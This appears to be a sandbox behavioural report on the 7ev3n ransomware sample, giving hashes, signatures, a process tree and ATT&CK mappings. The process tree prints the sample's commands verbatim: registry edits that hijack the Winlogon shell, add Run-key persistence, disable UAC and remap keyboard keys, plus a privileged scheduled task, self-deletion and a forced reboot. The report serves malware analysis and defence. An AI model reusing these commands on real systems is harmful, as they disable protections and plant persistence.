Analysis
- max time kernel: 27s
- max time network: 28s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 15-03-2024 21:34
Behavioral tasks (task: sample, resource image)
- behavioral1: 7ev3n.exe, win7-20240215-en
- behavioral2: 7ev3n.exe, win10v2004-20240226-en
- behavioral3: Annabelle.exe, win7-20240221-en
- behavioral4: Annabelle.exe, win10v2004-20240226-en
- behavioral5: BadRabbit.exe, win7-20240221-en
- behavioral6: BadRabbit.exe, win10v2004-20231215-en
- behavioral7: Birele.exe, win10v2004-20240226-en
- behavioral8: Cerber 5.exe, win7-20240221-en
- behavioral9: Cerber 5.exe, win10v2004-20240226-en
- behavioral10: Darkside.exe, win7-20240221-en
- behavioral11: Darkside.exe, win10v2004-20240226-en
- behavioral12: DeriaLock.exe, win7-20240221-en
- behavioral13: DeriaLock.exe, win10v2004-20240226-en
General
- Target: 7ev3n.exe
- Size: 315KB
- MD5: 9f8bc96c96d43ecb69f883388d228754
- SHA1: 61ed25a706afa2f6684bb4d64f69c5fb29d20953
- SHA256: 7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
- SHA512: 550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
- SSDEEP: 6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes:
- reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"
UAC bypass
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Deletes itself (1 IoC)
Processes:
- cmd.exe, PID 2596

Executes dropped EXE (1 IoC)
Processes:
- system.exe, PID 1964

Loads dropped DLL (2 IoCs)
Processes:
- 7ev3n.exe, PID 2328 (2 loads)

Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
- reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
- shutdown.exe, PID 680: Token: SeShutdownPrivilege
- shutdown.exe, PID 680: Token: SeRemoteShutdownPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source PID and process -> target PID and process; each pair was logged 4 times):
- 2328 7ev3n.exe -> 1964 system.exe
- 1964 system.exe -> 2596 cmd.exe
- 1964 system.exe -> 2712 SCHTASKS.exe
- 1964 system.exe -> 2928 cmd.exe
- 1964 system.exe -> 2592 cmd.exe
- 1964 system.exe -> 2156 cmd.exe
- 1964 system.exe -> 2752 cmd.exe
- 1964 system.exe -> 2708 cmd.exe
- 1964 system.exe -> 2632 cmd.exe
- 2592 cmd.exe -> 2528 reg.exe
- 2928 cmd.exe -> 1316 reg.exe
- 2156 cmd.exe -> 2072 reg.exe
- 2752 cmd.exe -> 2516 reg.exe
- 2632 cmd.exe -> 2272 reg.exe
- 2708 cmd.exe -> 2060 reg.exe
- 1964 system.exe -> 1260 cmd.exe
Processes (indented by parent/child depth; "tags" lists the signatures attached to each process)
- C:\Users\Admin\AppData\Local\Temp\7ev3n.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"
  tags: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\system.exe
    command line: "C:\Users\Admin\AppData\Local\system.exe"
    tags: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c C:\Users\Admin\AppData\Local\del.bat
      tags: Deletes itself
    - C:\Windows\SysWOW64\SCHTASKS.exe
      command line: C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
      tags: Creates scheduled task(s)
    - C:\windows\SysWOW64\cmd.exe
      command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        tags: Modifies WinLogon for persistence
    - C:\windows\SysWOW64\cmd.exe
      command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        tags: Adds Run key to start application
    - C:\windows\SysWOW64\cmd.exe
      command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    - C:\windows\SysWOW64\cmd.exe
      command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
    - C:\windows\SysWOW64\cmd.exe
      command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
    - C:\windows\SysWOW64\cmd.exe
      command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
      tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
        tags: UAC bypass
    - C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
      - C:\Windows\SysWOW64\reg.exe
        command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
    - C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
      - C:\Windows\SysWOW64\shutdown.exe
        command line: shutdown -r -t 10 -f
        tags: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\LogonUI.exe
  command line: "LogonUI.exe" /flags:0x0
- C:\Windows\system32\LogonUI.exe
  command line: "LogonUI.exe" /flags:0x1
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Scheduled Task/Job (1)
Downloads
- C:\Users\Admin\AppData\Local\del.bat
  Filesize: 65B
  MD5: f727ee128a7eeb23b9c3242b049e61ef
  SHA1: a260ee1e7c05377830130163737c7609598d61ee
  SHA256: 98bfdb556f8e8a2564cadfd0c62fff7b81b3a70a4f7e03a86f704fabd5d3c884
  SHA512: c59a537dbd2349d0f29b6596d35c387fbb76a2cde16fddee04c3d861221c2a7a9ef1af67577a63a80523ec4fc079cc64090e3e86544730bf9cdac2ca122a9c0e
- \Users\Admin\AppData\Local\system.exe
  Filesize: 315KB
  MD5: 960210c40a73291e4349cb16c26afc66
  SHA1: e90335ab561ca12801b22e15446c84f90ab53588
  SHA256: fef8a83f4105221a01de09749072671b2c6c944a5d52c15d0852cc9a4b6c4890
  SHA512: 44a42cc7a5baab876e3a7fce4d9d05839de666577306985d8d5920f38f0150ce335c351eaa4d8f834b43abfcb26eb3aa06fbb467dc56695eacd35ad11d8a259a
- memory/1860-105-0x0000000002D90000-0x0000000002D91000-memory.dmp
  Filesize: 4KB
- memory/2112-106-0x0000000002B30000-0x0000000002B31000-memory.dmp
  Filesize: 4KB